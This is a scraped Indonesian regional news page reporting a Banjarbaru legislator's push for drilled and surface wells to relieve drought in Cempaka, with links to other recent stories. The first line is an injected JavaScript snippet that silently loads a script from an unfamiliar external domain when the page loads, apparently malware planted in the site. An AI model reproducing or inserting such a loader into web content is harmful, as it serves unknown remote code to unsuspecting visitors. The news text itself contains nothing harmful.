(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
DPRD BANJARBARU

Wakil Ketua DPRD Perjuangkan Pembuatan Sumur Bor Warga Cempaka


KANALKALIMANTAN.COM, BANJARBARU – Wakil Ketua DPRD Banjarbaru, Taufik Rachman memperjuangkan aspirasi warga Kelurahan Cempaka yang ingin dibuatkan sumur bor dan sumur permukaan mengatasi kekeringan.

“Hasil reses kami yang dilaksanakan, masyarakat meminta dibuatkan sumur bor dan sumur permukaan yang berguna untuk mengatasi kekeringan,” ujarnya, Senin (4/12/2023).

Taufik mengatakan, saat reses menyerap aspirasi masyarakat mengunjungi enam lokasi dengan permintaan yang berbeda-beda dan berupaya diperjuangkan melalui program pemerintah kota.

Ditekankan, pihaknya menjaring aspirasi warga yang dikunjungi pada enam lokasi dan menyampaikan berbagai permasalahan termasuk kekurangan air bersih terutama saat musim kemarau.

Baca juga: Anggota DPRD Kapuas Berharap Perluasan Lapangan Kerja Lulusan SMA SMK

“Kami siap memperjuangkan setiap aspirasi masyarakat dan berharap kesulitan air bersih yang dialami oleh warga teratasi dengan dibuatkannya sumur bor dan sumur permukaan di kawasan itu,” ucapnya.

Diakui Taufik, saat musim kemarau seperti yang terjadi beberapa waktu lalu, masyarakat kesulitan air bersih karena sumur mengalami kekeringan sehingga meminta bantuan BPBD untuk mendapatkan air bersih.

“Kesulitan warga mendapatkan air bersih harus disikapi Pemko dengan membangunkan sumur bor maupun sumur permukaan sehingga mereka tidak lagi mendapatkan air bersih saat musim kemarau,” ujarnya.

Sementara itu, saat reses ke lokasi yang telah ditentukan, politisi Partai Golkar itu menggunakan kesenian madihin dengan tujuan menghidupkan kesenian daerah.

Baca juga: Tilep Dana BOS, Pengawas SD di Tapin Menangis Dituntut 15 Bulan Penjara

“Saat kunjungan ke lokasi reses kami menghadirkan satu pemadihin yang tampil menghibur warga sekaligus menghidupkan kesenian daerah yang menjadi tradisi dan harus tetap dikenal masyarakat,” katanya. (Kanalkalimantan.com/bie)

Reporter : bie
Editor : kk


Risa

Recent Posts

Hari Museum Internasional 2024 “Museum untuk Pendidikan dan Penelitian”

KANALKALIMANTAN.COM - Hari Museum Internasional yang ditetapkan oleh ICOM dan dirayakan setiap tahun pada tanggal… Read More

4 jam ago

Masrumi dari Desa Sungai Namang HSU Raih Prestasi Nasional

KANALKALIMANTAN.COM, SOLO – Masrumi, guru honorer asal Desa Sungai Namang, Kecamatan Danau Panggang, Kabupaten Hulu… Read More

5 jam ago

Pemkab HSU Gelar Upacara HUT ke-75 Proklamasi ALRI Divisi IV Kalimantan

KANALKALIMANTAN.COM, AMUNTAI - Memperingati HUT ke-75 Proklamasi Pemerintahan Gubernur Tentara ALRI Divisi lV Pertahanan Kalimatan,… Read More

5 jam ago

Mantan Karyawan BPR Candi Agung Amuntai Dituntut 7 Tahun

Selewengkan Dana Nasabah, Rugikan Negara Rp779 Juta Read More

5 jam ago

Ungkap Kasus Curanmor di Banjarbaru, 4 Unit Motor Berplat Merah

7 Pelaku Ditangkap dengan Barbuk 21 Unit Sepeda Motor Read More

9 jam ago

Kontestan Kepala Daerah di Kalsel Ditantang Miliki Visi Majukan Perpustakaan

KANALKALIMANTAN.COM, BANJARMASIN - Tim Tenaga Ahli Gubernur Kalimantan Selatan (Kalsel) melakukan kunjungan ke Dinas Perpustakaan… Read More

11 jam ago

This website uses cookies.